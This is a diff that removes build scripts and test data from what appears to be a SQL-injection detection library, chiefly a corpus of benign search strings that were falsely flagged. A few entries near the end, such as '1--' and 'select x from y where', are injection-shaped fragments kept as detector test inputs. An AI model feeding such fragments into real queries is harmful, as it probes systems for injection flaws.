export CFLAGS="-g -ansi -fpic -O3 -Weverything -Wno-unused-macros -Wno-padded -Wno-covered-switch-default -Wno-disabled-macro-expansion -Werror"
|
||||
make -e check
|
|
@ -1,16 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# See https://wiki.debian.org/Hardening for details
|
||||
#
|
||||
# -Wno-padded padding can change by OS/version this check is really
|
||||
# for embedded systems so it's ok to skip
|
||||
#
|
||||
# -Wno-covered-switch-default Don't warn if we have a switch that
|
||||
# covers all of an enum AND we have a default. enums are only loosely
|
||||
# typed, it's good to have a default: assert(0) in case someone does
|
||||
# a bad cast, etc also this conflicts with GCC checks.
|
||||
#
|
||||
make clean
|
||||
export CFLAGS="-g -O3 -pie -fPIE -fPIC -fstack-protector --param ssp-buffer-size=4 -Wall -Wextra -Wformat -Wformat-security -Werror -Wcast-align -Wshadow -Wpointer-arith -Wcast-qual -Wstack-protector -D_FORTIFY_SOURCE=2 -ansi -pedantic"
|
||||
make -e
|
|
@ -1,11 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# gprof build
|
||||
#
|
||||
make clean
|
||||
export CC=gcc
|
||||
export CFLAGS="-ansi -g -O0 -fprofile-arcs -ftest-coverage -Wall -Wextra"
|
||||
make -e
|
||||
|
||||
|
|
@ -1,9 +0,0 @@
|
|||
#!/bin/sh
|
||||
set -e
|
||||
#
|
||||
# gprof build
|
||||
#
|
||||
make clean
|
||||
export CFLAGS="-O2 -pg -ansi"
|
||||
make -e
|
||||
|
|
@ -1,12 +0,0 @@
|
|||
Files in this directory are sample input for SQLi or false positives
|
||||
|
||||
Lines that are empty or start with `#` ignored. Otherwise they should
|
||||
be URL-encoded "user input" as might be found in query string.
|
||||
|
||||
Each of the `sqli-\*.txt` files should generate a sqli match (with a few
|
||||
outliers).
|
||||
|
||||
The `false-positive.txt` file are inputs that in the process of
|
||||
development where falsely marked as sqli.
|
||||
|
||||
|
|
@ -1,443 +0,0 @@
|
|||
#
|
||||
# List of various inputs that failed and caused a false positive
|
||||
#
|
||||
24-7-TEAM
|
||||
A-LAST-MINUTE
|
||||
1/26/11
|
||||
TRUE#LAST
|
||||
1D0AA0A700000004/9GUH7NYWTMDHBAA CTFT0FG7/W4AWAABAAAAGK0WQAGHAAAAGAAABJMCGA=
|
||||
HTTP://WWW.TINYBELLESBLOG.COM/2011/11/2ND-ANNIVERSARY3K-FAN-GIVEAWAY.HTML#{"COLOR":"#2A1100","BACKGROUNDCOLOR":"WHITE","UNVISITEDLINKCOLOR":"#D860A7","FONTFAMILY":"GEORGIA, SERIF"}
|
||||
NOT ALL WHO WANDER
|
||||
ALL NATURAL SKIN CARE
|
||||
DAD TO BE
|
||||
UNIQUE TABLE RUNNER
|
||||
AS FOR ME AND MY HOUSE
|
||||
LOCK AND KEY
|
||||
1 BY 1 INCH PILLOWS
|
||||
SET WITH ENVELOPES
|
||||
FROM TO TAG CHRISTMAS
|
||||
3 BY 5 RECIPE CARDS
|
||||
3 TO 6 MONTHS
|
||||
BY ORDER OF THE MANAGEMENT
|
||||
A IS FOR ADORABLE
|
||||
WHERE IS GEORGE
|
||||
KEY TO MY HEART
|
||||
Y'ALL COME BACK NOW
|
||||
1950's dresses
|
||||
EC-2HM85288X8372881C
|
||||
4/_ZBKO2JKUCJC73C8KPIUDTJ3IMGM
|
||||
MATS 5" BY 7"
|
||||
I'M AFRAID SO. YOU'RE ENTIRELY BONKERS. BUT I'LL TELL YOU A SECRET THE BEST PEOPLE ARE" - ALICE
|
||||
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE
|
||||
JACK-O'-LANTERN?
|
||||
7 AND A HALF
|
||||
7 FOR ALL MANKIND
|
||||
5 AND A QUARTER BY 8 INCHES
|
||||
40 AND FAB
|
||||
6 KEY CHAR
|
||||
3 FOR 20
|
||||
F AND A NECKLACE
|
||||
21 LONG IN
|
||||
FD AND C COSMETIC COLORANT
|
||||
2 OR 4 METAL BUTTONS
|
||||
13 IS A LUCKY NUMBER
|
||||
1 AND 1/2" BUTTON
|
||||
"DARE TO BE AWESOME":
|
||||
"ALASKA" + 1978
|
||||
10 DOUBLE LOOP SETS
|
||||
B IS FOR BLACK BY TATIANA SOROKA
|
||||
DANCIN' LIKE A ROBOT ON FIRE
|
||||
D AND D DICE
|
||||
BE TRUE 2 U
|
||||
B AND A PRINTS
|
||||
"SWEATER DRESS" AND "CHRISTMAS"
|
||||
SMALL "& SIGN
|
||||
9-2-5 BLACK PUMPS
|
||||
2-3/4 CELLO BAGS
|
||||
30-30-60 INVITE
|
||||
11-11-11 DAY POPPY
|
||||
4-1-7-CUEIPNJF1QIETPB8PQBVZ5
|
||||
1-1/8 PLUGS
|
||||
1 1/8 PLUGS
|
||||
1&1/8 PLUGS
|
||||
909-527-9247
|
||||
+1 (917) 666-0987
|
||||
(9178787873)
|
||||
(junk)
|
||||
"PINK ROSES" -DRESS -CLOTHES -SWEATER -COAT -JACKET -SKIRT -PANTS -SHIRT
|
||||
DRESS SIZE 20" -PATTERN -BABY
|
||||
"CROSS STITCH" -PDF -WOOL
|
||||
DRESS WITH HAT 18';
|
||||
2:1320316063:9-3Z6OMATJOWG5BO2JWF3I2S0QEN:XXMET8ACIJ1CVLEHB5MBBW-NPIEQ:0440D7CD127A7FBFCB9D17B01D38FB0A7C0EBC11
|
||||
HUGE BRASS CLOCK GEAR 2 3/4" - VINTAGE - STEAMPUNKVINTAGEFIND AT ETSY G194
|
||||
IN ORDER TO USE SEARCH
|
||||
BEGIN EACH DAY WITH LOVE
|
||||
SQL-3-RMGN_V-BBNGV40NGQRAGGZ
|
||||
IF-9-86MDXMB1Z-FINBSB4WIDF-B
|
||||
HTTP://CONTUBO.TV/VIDEOS/1949/2-BEST-MINIFALDAS,-TANGAS,CULONAS-MINISKIRTS"-BIKINIS-"SEXY-GIRLS"-BOOBIES-BOOTTIES
|
||||
GROUP UPDATE FACEBOOK LINK NOT PROVIDED
|
||||
CHRISTMAS STOCKING "NOT" STUFFER
|
||||
ORDER@ALLTHATSHEWANTS.US
|
||||
ALL@MKSAT.NET
|
||||
ALL NATURAL SHA
|
||||
WHERE IS THE SHOW
|
||||
"ALASKA" + 1978
|
||||
SMALL "&" SIGN
|
||||
50%2526%252339%253Bs
|
||||
VINTAGE CARVED BEAD'" -LUCITE -PLASTIC
|
||||
pr_shop%22%3EMamaBearBabyWear%3C/a%3E
|
||||
poem+'if'
|
||||
CRAFT SHOW SET
|
||||
DIARY WITH LOCK
|
||||
CLIP ON READ
|
||||
CLOCK WITH KEYS
|
||||
THERE IS NOT PLACE LIKE HOME
|
||||
BASE; SET SWAROVSKI
|
||||
LED -(ZEPPELIN)
|
||||
LIFE IS NOT ABOUT WAITING FOR THE STORM TO PASS
|
||||
70" ROUND TABLE CLOTH
|
||||
"CASE"
|
||||
"RIGHT ON"
|
||||
"NOT ALL WHO WANDER"
|
||||
V1_OTHER_1"><IMG CLASS="SIZE-FULL WP-IMAGE-2764
|
||||
CAT2_GALLERY_20">ETSY</A
|
||||
OUR FIELD BAG IS INTENDED AS A DAILY WORKHORSE, A CROSSOVER BETWEEN A TRADITIONAL ENGLISH FISHING BAG AND AN URBAN MESSENGER BAG. DURABLE CONSTRUCTION AND PRACTICAL FEATURES ALLOW THE BAG TO EXCEL AT CARRYING GEAR BOTH OUTDOORS AND TO THE OFFICE. THE FIELD BAG IS CONSTRUCTED FROM THE HIGHEST QUALITY MATERIALS: 22 OZ WAXED TWILL FABRIC, HORWEEN LEATHER, AND THREAD ARE OF US ORIGIN. WEBBING AND MOST OF OUR BRASS HARDWARE IS SOURCED FROM THE UK. RIRI ZIPPERS ARE MADE IN SWITZERLAND. FEATURES INCLUDE A ROOMY MAIN COMPARTMENT, TWO BELLOWS POCKETS, AND ONE LARGE POCKET ACROSS THE BACK OF THE FIELD BAG. A SOLID BRASS RING PROVIDES AN EASY ATTACHMENT POINT FOR KEYS OR FISHING NET. LEATHER STRAP, ROLLER BUCKLE, AND A HEAVY-DUTY ZIPPER SECURE THE BAG'S CONTENTS. EDGES ARE BOUND IN WAXED COTTON TAPE, ALL STRESS POINTS ARE BAR-TACKED OR RIVETED, AND EACH BAG IS HAND-NUMBERED. EASILY FITS LAPTOPS (UP TO 15") IN THE OWNER'S OWN SLEEVE. DIMENSIONS: 16" X 12.75" X 4"
|
||||
ALLENTOWN, () PA UNITED STATES
|
||||
/SEARCH/SUPPLIES?SEARCH_SUBMIT=&Q=STAR COPPER BLANK 1/2"&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
|
||||
/SEARCH/HANDMADE/ART/PRINT?SEARCH_QUERY=14 X 18"&SEARCH_SUBMIT=&SEARCH_TYPE=CATEGORY&CATEGORY=ART&PAGE=3
|
||||
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q=WOODEN EMBROIDERY HOOP (3")&ORDER=MOST_RELEVANT&SHIP_TO=US&VIEW_TYPE=GALLERY
|
||||
GREEN...GREEN...GREENISH))) BY JULIA
|
||||
BRIDAL SHOWER INVITATION RECIPE CARDS'===
|
||||
/SEARCH/HANDMADE?SEARCH_SUBMIT=&Q="<3"&VIEW_TYPE=GALLERY&SHIP_TO=FR
|
||||
/SEARCH/HANDMADE?Q=8.9" CASE&VIEW_TYPE=GALLERY&SHIP_TO=US
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS_EXACT&SEARCH_QUERY=RED SHOES 9"&PAGE=1&REF=RELATED
|
||||
7/" ALUMINUM DISC
|
||||
"MOD" "KITCHEN"
|
||||
'M M L"\\ INITIALS
|
||||
I' IS NOT A PLASTIC BAG
|
||||
;EACH
|
||||
;ON
|
||||
IPHONE CASE 4 CASE
|
||||
LAPTOP CASE 13 AND PHONE
|
||||
IPAD -4 CASE
|
||||
EP-2 CASE
|
||||
ECID=15&
|
||||
"///
|
||||
CARD IS 4 AND A HALF X 5 AND A HALF INCHES AND IS AVAILABLE IN A LARGER SIZE AS WELL
|
||||
2012 WRITE ON CALENDAR
|
||||
1960 OUTER SPACE METAL LUNCH BOX PAIL TIN DOME TOP 239-S
|
||||
MACBOOK CASE 13 -IPHONE -IPAD
|
||||
DUPIONI -UNIQUE -"-UNIQUE -FAT -FQ -RIBBON -TRIM -POLY -POLYESTER
|
||||
LAPTOP CASE 14'
|
||||
"UNIQUE" PRINTABLE WEDDING
|
||||
SILVER BRACELET "FORCE"
|
||||
MOVIN' ON T-SHIRT
|
||||
77921690/TURQUOISE-NATURAL-TU
|
||||
"WRITE" DESIGN
|
||||
"WHERE'S GEORGE"
|
||||
"UNIQUE" PRINTABLE WEDDING
|
||||
"UNION" BY ROBERT F
|
||||
"TABLE"
|
||||
"TRUE"
|
||||
"ON" WHITE GREEN
|
||||
"CREATE" STERLING GOLD
|
||||
"CHANGE" NECKLACE
|
||||
CHAIN MEASURES 18" AND IS COMPOSED COMPLETELY OUT OF BRASS
|
||||
TAN (WATER RESISTANT INSULATED) MESSENGER
|
||||
HAND-STITCHED MACBOOK AIR / MACBOOK PRO LEATHER SLEEVE (13") WITH FREE MONOGRAMMING
|
||||
1/4"-1/2" WIDE RIBBON
|
||||
1/4"-1" WIDE RIBBON
|
||||
BILLEEVERSBOUTIQUE , BROWNING "LIKE"
|
||||
'-"8 TRACK" PLAYER
|
||||
"AND WHEN THE KIDS ARE OLD ENOUGH"
|
||||
"AND WHEN THE KIDS ARE OLD
|
||||
5-ELGIFPIS-0LGAJJZ-NV54YKIS4
|
||||
"WOOD" AND "SIGN" AND "POLKA DOTS"
|
||||
TAN
|
||||
INFINITY LOOP SCARF
|
||||
INFINITY LOOP
|
||||
7 DEC 01
|
||||
CARDS @ TWITTER
|
||||
1;1;1;CONTROL;0;0;1;
|
||||
{%25 $NUM_VIEWS|STRING_FORMAT:"%25D" %25} VUES
|
||||
7 AND A HALF
|
||||
1060 OR 70S
|
||||
18 CREATE GOLD
|
||||
2 LOOP CONNECTORS
|
||||
7 AND HALF
|
||||
8 LOOP BOW
|
||||
8 OR 9 WLV
|
||||
00 AND 3
|
||||
10.00 AND UNDER
|
||||
102 TABLE CLOTH
|
||||
10 OR LESS
|
||||
TRUE-CUT
|
||||
1.25 READ BUTTONS
|
||||
"ON SALE ON SALE"
|
||||
(NEW AND UNIQUE)
|
||||
NEW AND UNIQUE)
|
||||
1 REAL FEATHER AND 1 PETITE REAL SHELL
|
||||
(DICKEY DICKIE*)
|
||||
(1297-MR)
|
||||
1297-MR),
|
||||
(BRASS) PEN -BULLET
|
||||
(CERAMIC OR POTTERY) MUGS
|
||||
3/4 FEAR AND LOATHING
|
||||
1 FEAR AND LOATHING
|
||||
9/16 PLUGS AND TUNNELS
|
||||
78881214/LARGE-PINK-QUARTZ-DROPS-AND-22K-GOLD
|
||||
"RETURN ADDRESS LABELS" STICKER
|
||||
"ON THE WAY"
|
||||
"ON THE AIR" SIGN
|
||||
20 SET 3/4
|
||||
20 SET 3
|
||||
"CREATE A CRITTER"
|
||||
"INTO THE WILD"
|
||||
"ON FIRE FOR" WHITE GREEN
|
||||
"FOR BETTER OR WORSE"
|
||||
(ANTIQUE, VINTAGE) QUILT
|
||||
ANTIQUE, VINTAGE) QUILT
|
||||
(TRUMPTON, IVOR, CLANGERS, POOH)
|
||||
TRUMPTON, IVOR, CLANGERS, POOH)
|
||||
OR-9-9WYTCZT313XRCN2UV62MBE1
|
||||
IS-8-RJYG1PGMI0GTBH2XDV8AKGZ
|
||||
(RUSTIC OR ORGANIC) EVERYDAY NECKLACE
|
||||
RUSTIC OR ORGANIC) EVERYDAY NECKLACE
|
||||
BLAH <A HREF="/PATH1/PATH2/PATH3">FOO</A>
|
||||
BLAH <A HREF="FOO.HTML">FOO</A>
|
||||
BLAH <A HREF="/FOO.HTML">FOO</A>
|
||||
RSCHMIDT @FPMC-WILLMAR/COM
|
||||
XSERVING"; ";PLATTER"; ";VINTAGE";
|
||||
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
|
||||
LLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;''''''''''''''''''''''''''''''''''''''''''''''';;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;LLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLLKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKL;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;';;LK
|
||||
SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) --
|
||||
SWIRLS DIGITAL SCRAPBOOK PAPER PACK (8.5X11"-300 DPI) -- 10 DIGITAL PAPERS -- 122
|
||||
HTTP://WWW.MECKMOM.COM/MMDL/CHRISTMAS BUDGET PLANNER.PDF';" HREF="HTTP:/WWW.MECKMOM.COM
|
||||
1.5 WITH 1/2 INCH LOOP END LOBSTER
|
||||
60;S MOD DRESSES
|
||||
7" #2 CIRCULAR NEEDLE
|
||||
9/PLUGS AND TUNNELS
|
||||
9/16PLUGS AND TUNNELS
|
||||
"NOT ON FACEBOOK"
|
||||
"#2 MOM"
|
||||
80%25 ACRYLIC AND 20%25 WOOL
|
||||
35%25 COTTON AND 65%25 POLYESTER.
|
||||
5685587||ORDER=||SECTION_ID=||PAGE=2
|
||||
{%25 $SENDER_FULL_NAME %25} BLAH BLAH BLAH {%25 $CONVO_SEND_DATE|DATE_FORMAT:'%25B %25D, %25Y' %25}.
|
||||
UJUUUI8UJKPKJMMJUMNMJUJMMNNJUJMNJJJMNJKJMJJKBJ9I8UJJMMNJNJJJJJJNNKJNMKUJJUNKJJJNJNJKJJJJJJJJJMNJJJJJKJIJJJJJJJJJJJJJJJJJGGGFSAQWERTYUIOP[]';LKGFDSAZXBNM,.
|
||||
BAMBOO CHARCOAL SOAP 1 '#
|
||||
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' -SHOES -SANDLES -HEEL --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
|
||||
BLUE BROWN -BABY -TODDLER -CCBCUSTOMDRESSES' --INFANT -CHILD -CHILDS -CHILDRENS -KID -KIDS -BOYS -BOY -MEN -MENS
|
||||
<SPAN CLASS="SHOW-TEXT">REGARDEZ</SPAN>
|
||||
BOOKMAR';[K]]
|
||||
WOOL AND ACRYLIC FOR SOFTNESS
|
||||
01/DEC/2011:20:45:25
|
||||
0;1;0;1;0
|
||||
5-DEC-QRIBMKCDNBUO2ELCW2FGFI
|
||||
WOMEN';S ART DEC
|
||||
DO OR NOT DO, THERE IS NO
|
||||
ABC AND 123 WALL DEC
|
||||
1.5 WITH 1/2 INCH LOOP END
|
||||
"NOT FOR SALE"
|
||||
"IS" STAMP
|
||||
"LIKE" STAMP
|
||||
/SEARCH/?INCLUDES=&SEARCH_QUERY=TYPOGRAPHY+PRINT+"WITH+YOU"&REF=RELATED&PAGE=1
|
||||
1950' AND 60'S WOMEN'S COATS WITH FAKE
|
||||
FOO; BAR 1+2+3
|
||||
WO;DCAT[JPTPGRA][
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK PRO DECALS 15"&PAGE=2
|
||||
/SEARCH_RESULTS.PHP?SEARCH_TYPE=ALL&INCLUDES[0]=TAGS&SEARCH_QUERY=MACBOOK+PRO+DECALS+15&PAGE=2
|
||||
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%26PAGE%3D2
|
||||
%2FSEARCH_RESULTS.PHP%3FSEARCH_TYPE%3DALL%26INCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DMACBOOK%2BPRO%2BDECALS%2B15%22%26PAGE%3D2
|
||||
KNICKIN' AND KNACKIN' SEE WHAT ONFIRE'S PACKIN' FOR CHRISTMAS BY ANNIE BECWAR
|
||||
0=[]'
|
||||
"AS FOR ME AND MY
|
||||
"EXIT, PURSUED B
|
||||
"EXIT, PURSUED BY
|
||||
4%27%2BX%2B4%27%2BWOOD
|
||||
48%22%2BX%2B48%22%2BMODERN%2BART
|
||||
90-%2B6%2BINCH
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D20%22%2BX%2B20%22%2BPILLOW%2BCOVER%2BGREEN%2BPATTERN%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22NOT%2BAMUSED%22%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DZZ%26VIEW_TYPE%3DGALLERY%26PAGE%3D4
|
||||
%2FSEARCH%2FHANDMADE%2FPLANTS_AND_EDIBLES%3FSEARCH_SUBMIT%3D%26Q%3D%22SET%2BOF%2B6%22%26MAX%3D18%26ORDER%3DMOST_RELEVANT%26SHIP_TO%3DUS%26VIEW_TYPE%3DGALLERY
|
||||
%2FSEARCH%2FVINTAGE%3FSEARCH_SUBMIT%3D%26Q%3D%22TABLE%2BLAMP%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D10
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DSHABBY%2B%22AND%2BWHITE%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D6
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DSILVER%2BCHAIN%2B20%22%26FILTER%5B0%5D%3DSUPPLIES
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%5B0%5D%3DVINTAGE
|
||||
%2FSEARCH_RESULTS.PHP%3FINCLUDES%5B0%5D%3DTAGS%26SEARCH_QUERY%3DWALDORF%2BDOLLS%2B16%22%26FILTER%3DVINTAGE
|
||||
%2FSEARCH%2FHANDMADE%3FQ%3DYELLOW%2BPHOTOGRAPHY%2BBACKDROP%2B%2B-3%27%2B-4%27%2B-DIGITAL%2B-MINI%26VIEW_TYPE%3DGALLERY
|
||||
HTTP%3A%2F%2FDEEDEECAMPBELL.BLOGSPOT.COM%2F2011%2F12%2FHAPPY-SNOWMAN-TAG.HTML%3FUTM_SOURCE%3DFEEDBURNER%26UTM_MEDIUM%3DFEED%26UTM_CAMPAIGN%3DFEED%3A%2BSCRAPPINWITHDEEDEE%2B%28SCRAPPIN%27%2BWITH%2BDEEDEE%29
|
||||
RECLAIMED%20WOOD%22%20%2B%20%22SIGN%22%20%2B%20%22PRIMITIVE%22
|
||||
%22MOD%22%20%22
|
||||
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22MOD%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS%26PAGE%3D14
|
||||
/SEARCH%3FSEARCH_SUBMIT%3D%26Q%3D36%22%2BX%2B48%2B%22%2BFRAME%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
DO%20OR%20NOT%20DO
|
||||
DO%20OR%20NOT%20DO%2C
|
||||
9%216%2BEARINGS
|
||||
%22NOT+GAY+AS+I
|
||||
%22+-+%22MAGAZINE%22
|
||||
FAITES+UN+TOUR+SUR+NOTRE+NOUVELLE+%3CBR+%2F%3E%3CA+HREF%3D%22%2FAPPS%2F%22%3EGALERIE+D%27APPLICATIONS%3C%2FA%3E%21
|
||||
RENCONTREZ+DES+PERSONNES+AVEC+QUI+VOUS+AVEZ+DES+INTRTS+COMMUNS+ET+COLLABOREZ+AVEC+EUX.+TROUVEZ+DES+TEAMS+LOCAUX++REJOINDRE+SUR+LA+%3CA+HREF%3D%22%2FTEAMS%2F%22%3EPAGE+DES+TEAMS%3C%2FA%3E
|
||||
FHFUIVJGUJOKKIIKIIOJKK%5BI%5B%27%3D%5C%5D%3D-%5DL%3B/...
|
||||
%27-%228
|
||||
%27-%228%20TRACK%22
|
||||
%27-%228%20TRACK%20PL
|
||||
2%20got%20%40AOL.COM
|
||||
L%3BIN%20TABLE%20RUNNER
|
||||
OW%3BCAST%20IRON%20TRIVETS
|
||||
/SEARCH/HANDMADE%3FSEARCH_SUBMIT%3D%26REF%3DAUTO%26Q%3DPICTURES%2BFRENCH%2B11%22%2B-%2B14%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
SET%208%20-MINI%20AS
|
||||
1/4%22-1/2RIBBON
|
||||
1/4%22-1/RIBBON
|
||||
PHILLIPKEEGAN-777-%40HOTMAIL.COM
|
||||
AUG%2B15%2BKEYS
|
||||
%22foo%22+AND+%22bar%22+AND
|
||||
%22foo%22+AND+%22bar%22
|
||||
%22WILD+OLIVE%22+%2B+%22YELLOW+CHERRIES%22
|
||||
%22WHITE%22+%2B+%22PLATE%22+%2B+%22POTTERY%22
|
||||
FOO+BAR%27%23+BLAH
|
||||
5%2F8%2BLOOP
|
||||
CONNECTORS+%2B+2-PRONG
|
||||
50%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
|
||||
50PCS%2BANTIQUE%2BBRONZE%2BFINISH%2BCONNECTORS%2B8MM%2B%280633%29
|
||||
32%2BKRAFT%2BBROWN%2B%22HANDMADE%22%2BSTICKER
|
||||
25%2BSIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS
|
||||
%281156-MG%29%2BNEW%2BMATTE%2BGOLD%2BPLATED%2BTEXTURED%2BLINKED%2B3-RING%2BPENDANTS
|
||||
%22CROSS+STITCH%22+%2B+%22TREE+SKIRT
|
||||
%2FSEARCH%3FQ%3D15%22%2BLAPTOP%2BCASE%26PAGE%3D6
|
||||
%2BIPHONE%2B4%2BCASE
|
||||
%22TERRACE%22++-++1932++-++WM.+ROGERS+MFG.+CO.
|
||||
%22ATEAM%22+AND+AND+%22GIFT+CERTIFICATE%22
|
||||
%22CLIP+ON%22+-EARRING%2A+-SWEATER+-SHOE%2A+-TIE%2A+-EPHEMERA+-CUFFLINK%2A+-HAIR+-BARRETTE%2A+-DRESS%2A+-BROOCH%2A+-PIN%2A+-MONEY+-PRINT
|
||||
4%2FABKDFAY1YORLFIM6NZYU8DTZP1-1
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3DPIN%2B%22AS%2BIS%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22AND%2BWHEN%2BTHE%2BKIDS%2BARE%2BOLD%2BENOUGH%22%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
THING%2B1%2BAND%2BTHING%2B2
|
||||
1Q9D819XMTILZVG1BOBY27-4-ROW
|
||||
NOT+AS+SAD+AS+I+USED+TO+BE
|
||||
NOT+AS+SAD+AS+I
|
||||
IPHONE%2B4%2BCASE%2BRUSSIAN
|
||||
COPPER%2B20%2BROUND
|
||||
CASE+FOR+KINDLE+WITH+KEYBOARD
|
||||
%2FSEARCH%2FHANDMADE%3FSEARCH_SUBMIT%3D%26Q%3D%22LIKE%22%2BSTAMP%26VIEW_TYPE%3DGALLERY%26SHIP_TO%3DUS
|
||||
MISTERGLAS.DK%27%2A%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27%27
|
||||
BIRTHDAY%2B12%2BMONTH%2B
|
||||
6R2OS3JNSM-48-IN-0ZENVYLUJJL
|
||||
14+1%2F2%22+-+USUALLY+FOR+3+MONTHS+TO+6+MONTHS
|
||||
XVPG_TLIHBUY60_ZHXPSA-4-PI-P
|
||||
GALLERY%3D1%3D5
|
||||
I+%3C3+%3C3
|
||||
I+%3C3+%3C3+THE+DOCTOR
|
||||
SIZE%2B36%2B%287%2F8%2BINCH%29%2BCOVER%2BBUTTONS%2BSTARTER%2BKIT
|
||||
4%7C28940%7C10142125%7C6003940396642%7C6003940506642%7C%7C%7CTC%7C%7CC%7C%7C%7C
|
||||
-3-B39RBBO58YMVIHEVAUZBS-6TF
|
||||
.75+%22+X+1.5%22
|
||||
"SIGNAL LOCK"
|
||||
3 TABLE LAMP WITH FLOWERS
|
||||
9483773&REFERRING_LISTING_ID=62611583&REF=LS_CONTACT_BOTTOM
|
||||
1950 UNION MADE
|
||||
EWELRY; __UTMC=111461200; __UTMB=111461200.37.10.13431224
|
||||
1 AND A1/2 INCH LIME GREEN GROSGRAIN RIBBON
|
||||
3271888&SR=1-1-SPELL&KEYWORDS=LEGAND+POSTER
|
||||
SHELL IS 65 AND 35 POLY COTTON BLEND
|
||||
Y; __UTMC=111461200; __UTMB=111461200.29.10.1342974283
|
||||
5EOR-5MDKFIKK50HAHCPYPUVLG-2
|
||||
LISTING-PRICE"> P="L TING-PRICE"> <A-TRIGVORITE LISTING-FAVORITE INNNNN SHABBY CHIC CREAM CURTAINS VINTAGE CURTAI RIG <IMG SRC=
|
||||
5683190/TARGET="_BLANK"
|
||||
3 TRAILING AIRPLANES WITH YOUR NAME DECAL
|
||||
SUKAN / SET (2 PIECE) HAND WOVEN ORIGINAL SILK
|
||||
|
||||
# some base64 things?
|
||||
zzh7W_krs4jSNwVV2TssQsSbOj--
|
||||
1611-IioXXIG1ti8rspL2vbXFy--
|
||||
1611/IioXXIG1ti8rspL2vbXFy--
|
||||
|
||||
Mosaic "Table top"
|
||||
|
||||
# Used in HTTP headers, e.g. Accept: */*
|
||||
*/*
|
||||
"Dr. Who" and coffee
|
||||
"rose gold" necklace 14
|
||||
"flagging" -american -festive --peace -prayer -america -stripes -straws
|
||||
shabby "and white
|
||||
|
||||
"3 1'/3
|
||||
"*"
|
||||
necklace length 16" or 18"
|
||||
4 pcs- (5003-BK) 14mm Black
|
||||
"Keys"
|
||||
"dec"
|
||||
'countdown calendar" and "disney:
|
||||
1950 or 1960
|
||||
black and "shower curtain"
|
||||
dad and keychain and "loved by"
|
||||
if all else fails call grandma
|
||||
case 13"
|
||||
12.5 x 12.5"
|
||||
|
||||
O'connors UNION selected a few friendsf from a
|
||||
O'connors UNION selected a few friendsf from
|
||||
O'connors UNION selected a few friendsf fr
|
||||
O' UNION selected a few friends
|
||||
O'connors UNION selected a few friends
|
||||
1 I like having true friends
|
||||
I like having true friends
|
||||
I having true friends
|
||||
I was having true friends
|
||||
1 having
|
||||
|
||||
"1--"
|
||||
'1--'
|
||||
"1--
|
||||
'1--
|
||||
|
||||
1 collate these union documents
|
||||
17+inch+PC+LAPTOP+Sleeve%2FBag%2FCase+with+zipper+pocket+and+adjustable+strap
|
||||
|
||||
# from https://github.com/client9/libinjection/issues/49
|
||||
1,(1)
|
||||
Toronto, ON, Canada - (YYZ)
|
||||
1,1--
|
||||
(1)-x
|
||||
1 function (1)
|
||||
'/1x-
|
||||
# technically x OR 1
|
||||
#x|x||1
|
||||
select 'and'
|
||||
x/void(1)
|
||||
select x from y where
|
||||
x/*
|
||||
1x(((
|
||||
1),(1
|
||||
x, @x, @x
|
||||
|
||||
#
